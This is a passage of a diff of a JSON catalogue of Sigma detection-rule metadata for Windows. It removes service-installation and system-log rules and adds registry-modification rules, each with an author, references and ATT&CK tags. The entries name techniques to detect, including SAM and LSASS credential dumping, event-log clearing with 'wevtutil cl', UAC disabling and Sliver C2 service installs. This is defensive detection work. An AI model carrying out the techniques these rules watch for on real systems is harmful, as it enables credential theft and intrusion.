"2022/01/05", "falsepositive": [ "Unknown" ], - "filename": "win_system_service_install_paexec.yml", + "filename": "registry_set_disable_uac_registry.yml", "level": "medium", - "logsource.category": "No established category", + "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.poweradmin.com/paexec/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_paexec.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002" - ] - }, - "uuid": "de7ce410-b3fb-4e8a-b38c-3b999e2c3420", 
- "value": "PAExec Service Installation" - }, - { - "description": "Detects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines.\nPDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines\n", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/22", - "falsepositive": [ - "Legitimate use of the tool" - ], - "filename": "win_system_service_install_pdqdeploy.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_pdqdeploy.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-8---disable-uac-using-regexe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_uac_registry.yml" ], "tags": [ "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1548.002" ] }, - "uuid": "ee9ca27c-9bd7-4cee-9b01-6e906be7cae3", - "value": "New PDQDeploy Service - Server Side" + "uuid": "48437c39-9e5f-47fb-af95-3d663c3f2919", + "value": "Disable UAC Using Registry" }, { - "description": "Detects PDQDeploy service installation on the target system.\nWhen a package is deployed via PDQDeploy it installs a remote service on the target machine with the name \"PDQDeployRunner-X\" where \"X\" is an integer starting from 1\n", + "description": "Detects the manipulation of persistent URLs which can be malicious", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/22", + "author": "Tobias Michalski", + "creation_date": "2021/06/09", "falsepositive": [ - "Legitimate use of the tool" + "Unknown" ], - "filename": 
"win_system_service_install_pdqdeploy_runner.yml", - "level": "medium", - "logsource.category": "No established category", + "filename": "registry_set_outlook_registry_webview.yml", + "level": "high", + "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_pdqdeploy_runner.yml" + "https://support.microsoft.com/en-us/topic/outlook-home-page-feature-is-missing-in-folder-properties-d207edb7-aa02-46c5-b608-5d9dbed9bd04?ui=en-us&rs=en-us&ad=us", + "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_registry_webview.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1112" + ] + }, + "uuid": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", + "value": "Persistent Outlook Landing Pages" + }, + { + "description": "Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)", + "meta": { + "author": "frack113", + "creation_date": "2022/03/18", + "falsepositive": [ + "Legitimate admin script" + ], + "filename": "registry_set_set_nopolicies_user.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_set_nopolicies_user.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "1c3121ed-041b-4d97-a075-07f54f20fb4a", + "value": "Registry Explorer Policy Modification" + }, + { + "description": "Detects registry persistence technique using 
the GlobalFlags and SilentProcessExit keys", + "meta": { + "author": "Karneades, Jonhnathan Ribeiro, Florian Roth", + "creation_date": "2018/04/11", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_globalflags_persistence.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/", + "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_globalflags_persistence.yml" ], "tags": [ "attack.privilege_escalation", - "attack.t1543.003" + "attack.persistence", + "attack.defense_evasion", + "attack.t1546.012", + "car.2013-01-002" ] }, - "uuid": "b98a10af-1e1e-44a7-bab2-4cc026917648", - "value": "New PDQDeploy Service - Client Side" + "uuid": "36803969-5421-41ec-b92f-8500f79c23b0", + "value": "Potential GlobalFlags Registry Persistence Attempt" }, { - "description": "Detects PsExec service installation and execution events (service and Sysmon)", - "meta": { - "author": "Thomas Patzke", - "creation_date": "2017/06/12", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_service_install_psexec.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", - "https://jpcertcc.github.io/ToolAnalysisResultSheet", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_psexec.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" - ] - }, - "uuid": "42c575ea-e41e-41f1-b248-8093c3e82a28", - "value": "PsExec Service Installation" - }, - { - "description": "Detects Remote Utilities Host service installation on the target system.", + "description": 
"Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", "meta": { "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/31", - "falsepositive": [ - "Legitimate use of the tool" - ], - "filename": "win_system_service_install_remote_utilities.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.remoteutilities.com/support/kb/host-service-won-t-start/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_remote_utilities.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "85cce894-dd8b-4427-a958-5cc47a4dc9b9", - "value": "Remote Utilities Host Service Install" - }, - { - "description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands", - "meta": { - "author": "Florian Roth, Nasreddine Bencherchali", - "creation_date": "2022/08/25", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_service_install_sliver.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/client/command/commands.go#L1231", - "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_sliver.yml" - ], - "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1569.002" - ] - }, - "uuid": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", - "value": "Sliver C2 Default Service Installation" - }, - { - "description": "Detects a service installation that uses a suspicious double ampersand used in the image path 
value", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/07/05", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_service_install_susp_double_ampersand.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_susp_double_ampersand.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027" - ] - }, - "uuid": "ca83e9f3-657a-45d0-88d6-c1ac280caf53", - "value": "New Service Uses Double Ampersand in Path" - }, - { - "description": "Detects a TacticalRMM service installation. Tactical RMM is a remote monitoring & management tool.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/11/28", - "falsepositive": [ - "Legitimate use of the tool" - ], - "filename": "win_system_service_install_tacticalrmm.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_tacticalrmm.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ] - }, - "uuid": "4bb79b62-ef12-4861-981d-2aab43fab642", - "value": "TacticalRMM Service Installation" - }, - { - "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", - "meta": { - "author": "Dimitrios Slamaris", - "creation_date": "2017/05/15", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_susp_dhcp_config.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", - 
"https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", - "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_dhcp_config.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ] - }, - "uuid": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", - "value": "DHCP Server Loaded the CallOut DLL" - }, - { - "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", - "meta": { - "author": "Dimitrios Slamaris, @atc_project (fix)", - "creation_date": "2017/05/15", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_susp_dhcp_config_failed.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", - "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", - "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_dhcp_config_failed.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ] - }, - "uuid": "75edd3fd-7146-48e5-9848-3013d7f0282c", - "value": "DHCP Server Error Failed Loading the CallOut DLL" - }, - { - "description": "One of the Windows Core Eventlogs has been cleared. e.g. 
caused by \"wevtutil cl\" command execution", - "meta": { - "author": "Florian Roth, Tim Shelton", - "creation_date": "2022/05/17", - "falsepositive": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" - ], - "filename": "win_system_susp_eventlog_cleared.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/deviouspolack/status/832535435960209408", - "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_eventlog_cleared.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" - ] - }, - "uuid": "100ef69e-3327-481c-8e5c-6d80d9507556", - "value": "System Eventlog Cleared" - }, - { - "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/05/27", + "creation_date": "2022/08/01", "falsepositive": [ "Unlikely" ], - "filename": "win_system_susp_proceshacker.yml", + "filename": "registry_set_policies_associations_tamper.yml", "level": "high", - "logsource.category": "No established category", + "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://twitter.com/1kwpeter/status/1397816101455765504", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_proceshacker.yml" + "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465", + "https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_policies_associations_tamper.yml" ], "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1569.002" + "attack.defense_evasion" ] }, - "uuid": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", - "value": "ProcessHacker Privilege Elevation" + "uuid": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", + "value": "Modify Attachment Manager Settings - Associations" }, { - "description": "Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/30", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_susp_rtcore64_service_install.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/br-sn/CheekyBlinder/blob/e1764a8a0e7cda8a3716aefa35799f560686e01c/CheekyBlinder/CheekyBlinder.cpp", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_rtcore64_service_install.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", - "value": "RTCore Suspicious Service Installation" - }, - { - "description": "Detects suspicious SAM dump activity as cause by QuarksPwDump and other password dumpers", + "description": "Detects the installation of a plugin DLL via ServerLevelPluginDll parameter in Registry, which can be used to execute code in context of the DNS server (restart required)", "meta": { "author": "Florian Roth", - "creation_date": "2018/01/27", + "creation_date": "2017/05/08", "falsepositive": [ "Unknown" ], - "filename": "win_system_susp_sam_dump.yml", + "filename": "registry_set_dns_serverlevelplugindll.yml", "level": "high", - "logsource.category": "No established category", + "logsource.category": "registry_set", 
"logsource.product": "windows", "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_sam_dump.yml" + "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_serverlevelplugindll.yml" ], "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1112" ] }, - "uuid": "839dd1e8-eda8-4834-8145-01beeee33acd", - "value": "SAM Dump to AppData" + "uuid": "e61e8a88-59a9-451c-874e-70fcc9740d67", + "value": "DNS ServerLevelPluginDll Install - Registry" }, { - "description": "Detects suspicious service installation commands", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "meta": { - "author": "pH-T", - "creation_date": "2022/03/18", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "creation_date": "2019/10/25", "falsepositive": [ - "Unknown" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "filename": "win_system_susp_service_installation.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_service_installation.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" - ] - }, - "uuid": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", - "value": "Suspicious Service Installation" - }, - { - "description": "Detects service installation in suspicious folder appdata", - "meta": { - "author": "pH-T", - "creation_date": "2022/03/18", - 
"falsepositive": [ - "Unknown" - ], - "filename": "win_system_susp_service_installation_folder.yml", + "filename": "registry_set_asep_reg_keys_modification_currentversion_nt.yml", "level": "medium", - "logsource.category": "No established category", + "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_service_installation_folder.yml" + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml" ], "tags": [ "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.t1547.001" ] }, - "uuid": "5e993621-67d4-488a-b9ae-b420d08b96cb", - "value": "Service Installation in Suspicious Folder" + "uuid": "cbf93e5d-ca6c-4722-8bea-e9119007c248", + "value": "CurrentVersion NT Autorun Keys Modification" }, { - "description": "Detects service installation with suspicious folder patterns", + "description": "Detects tampering to RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", "meta": { - "author": "pH-T", - "creation_date": "2022/03/18", + "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", + "creation_date": "2022/09/29", "falsepositive": [ - "Unknown" + "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" ], - "filename": "win_system_susp_service_installation_folder_pattern.yml", - "level": 
"high", - "logsource.category": "No established category", + "filename": "registry_set_terminal_server_suspicious.yml", + "level": "medium", + "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_service_installation_folder_pattern.yml" + "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190407183310.html", + "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html", + "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", + "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03", + "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", + "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", + "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_suspicious.yml" ], "tags": [ + "attack.defense_evasion", "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.t1112" ] }, - "uuid": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", - "value": "Service Installation with Suspicious Folder Pattern" + "uuid": "a2863fbc-d5cb-48d5-83fb-d976d4b1743b", + "value": "RDP Sensitive Settings Changed to Zero" }, { - "description": "Detects suspicious service installation scripts", - "meta": { - "author": "pH-T", - "creation_date": "2022/03/18", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_susp_service_installation_script.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_service_installation_script.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" - ] - }, - "uuid": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", - "value": "Suspicious Service Installation Script" - }, - { - "description": "Windows Update get some error Check if need a 0-days KB", + "description": "Detects the modification of the registry settings used for Internet Explorer and other Windows components that use these settings", "meta": { "author": "frack113", - "creation_date": "2021/12/04", + "creation_date": "2022/01/22", "falsepositive": [ "Unknown" ], - "filename": "win_system_susp_system_update_error.yml", + "filename": "registry_set_ie_persistence.yml", "level": "low", - "logsource.category": "No established category", + "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_system_update_error.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-5---javascript-in-registry", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_ie_persistence.yml" ], "tags": [ - "attack.impact", - "attack.resource_development", - "attack.t1584" + "attack.defense_evasion", + "attack.t1112" ] }, - "uuid": "13cfeb75-9e33-4d04-b0f7-ab8faaa95a59", - "value": "Windows Update Error" + "uuid": "d88d0ab2-e696-4d40-a2ed-9790064e66b3", + "value": "Modification of IE Registry Settings" }, { - "description": "During exploitation of this vuln, two logs (providername:Microsoft-Windows-User Profiles Service) with eventid 1511 and 1515 (maybe lot of false positives with this event) are created. 
Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation.Viewed on 2008 Server", + "description": "Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability", "meta": { - "author": "Cybex", - "creation_date": "2022/08/16", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://packetstormsecurity.com/files/166692/Windows-User-Profile-Service-Privlege-Escalation.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" - ], - "tags": [ - "attack.execution" - ] - }, - "uuid": "52a85084-6989-40c3-8f32-091e12e17692", - "value": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919" - }, - { - "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", - "meta": { - "author": "Tim Rauch", - "creation_date": "2022/09/15", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_system_service_installation_by_unusal_client.yml", - "level": "high", - "logsource.category": "system", - "logsource.product": "windows", - "refs": [ - "https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_system_service_installation_by_unusal_client.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1543" - ] - }, - "uuid": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", - "value": "Service Installed By Unusual Client - System" - }, - { - "description": "Well-known TAP software installation. 
Possible preparation for data exfiltration using tunnelling techniques", - "meta": { - "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Legitimate OpenVPN TAP insntallation" - ], - "filename": "win_system_tap_driver_installation.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_tap_driver_installation.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048" - ] - }, - "uuid": "8e4cf0e5-aa5d-4dc3-beff-dc26917744a9", - "value": "Tap Driver Installation" - }, - { - "description": "Detects volume shadow copy mount via windows event log", - "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", - "creation_date": "2020/10/20", - "falsepositive": [ - "Legitimate use of volume shadow copy mounts (backups maybe)." - ], - "filename": "win_system_volume_shadow_copy_mount.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_volume_shadow_copy_mount.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002" - ] - }, - "uuid": "f512acbf-e662-4903-843e-97ce4652b740", - "value": "Volume Shadow Copy Mount" - }, - { - "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", - "meta": { - "author": "NVISO", - "creation_date": "2020/09/15", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_vul_cve_2020_1472.yml", - "level": "high", - "logsource.category": "No established category", - 
"logsource.product": "windows", - "refs": [ - "https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_vul_cve_2020_1472.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548" - ] - }, - "uuid": "a0cb7110-edf0-47a4-9177-541a4083128a", - "value": "Vulnerable Netlogon Secure Channel Connection Allowed" - }, - { - "description": "The attacker creates a computer object using those permissions with a password known to her.\nAfter that she clears the attribute ServicePrincipalName on the computer object.\nBecause she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/15", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_vul_cve_2021_42278_or_cve_2021_42287.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_vul_cve_2021_42278_or_cve_2021_42287.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1558.003" - ] - }, - "uuid": "44bbff3e-4ca3-452d-a49a-6efa4cafa06f", - "value": "Exploit SamAccountName Spoofing with Kerberos" - }, - { - "description": "This rule detects rare scheduled task creations. Typically software gets installed on multiple systems and not only on a few. 
The aggregation and count function selects tasks with rare names.", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/03/17", - "falsepositive": [ - "Software installation" - ], - "filename": "win_rare_schtask_creation.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/taskscheduler/win_rare_schtask_creation.yml" - ], - "tags": [ - "attack.persistence", - "attack.s0111", - "attack.t1053.005" - ] - }, - "uuid": "b20f6158-9438-41be-83da-a5a16ac90c2b", - "value": "Rare Scheduled Task Creations" - }, - { - "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/12/05", - "falsepositive": [ - "Unknown" - ], - "filename": "win_task_scheduler_susp_task_locations.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/taskscheduler/win_task_scheduler_susp_task_locations.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1053.005" - ] - }, - "uuid": "424273ea-7cf8-43a6-b712-375f925e481f", - "value": "Suspicious Scheduled Tasks Locations" - }, - { - "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/04/29", - "falsepositive": [ - "Unknown" - ], - "filename": "win_terminalservices_rdp_ngrok.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg", - 
"https://ngrok.com/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1090" - ] - }, - "uuid": "64d51a51-32a6-49f0-9f3d-17e34d640272", - "value": "Ngrok Usage with Remote Desktop Service" - }, - { - "description": "Detects Access to LSASS Process", - "meta": { - "author": "Markus Neis", - "creation_date": "2018/08/26", - "falsepositive": [ - "Google Chrome GoogleUpdate.exe", - "Some Taskmgr.exe related activity" - ], - "filename": "win_defender_alert_lsass_access.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/attack-surface-reduction-exploit-guard?WT.mc_id=twitter", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_alert_lsass_access.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ] - }, - "uuid": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", - "value": "LSASS Access Detected via Attack Surface Reduction" - }, - { - "description": "Detects triggering of AMSI by Windows Defender.", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2020/09/14", - "falsepositive": [ - "Unlikely" - ], - "filename": "win_defender_amsi_trigger.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/amsi/how-amsi-helps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_amsi_trigger.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", - "value": "Windows Defender AMSI Trigger Detected" - }, - { - "description": "Detects disabling Windows Defender threat protection", - "meta": { - "author": 
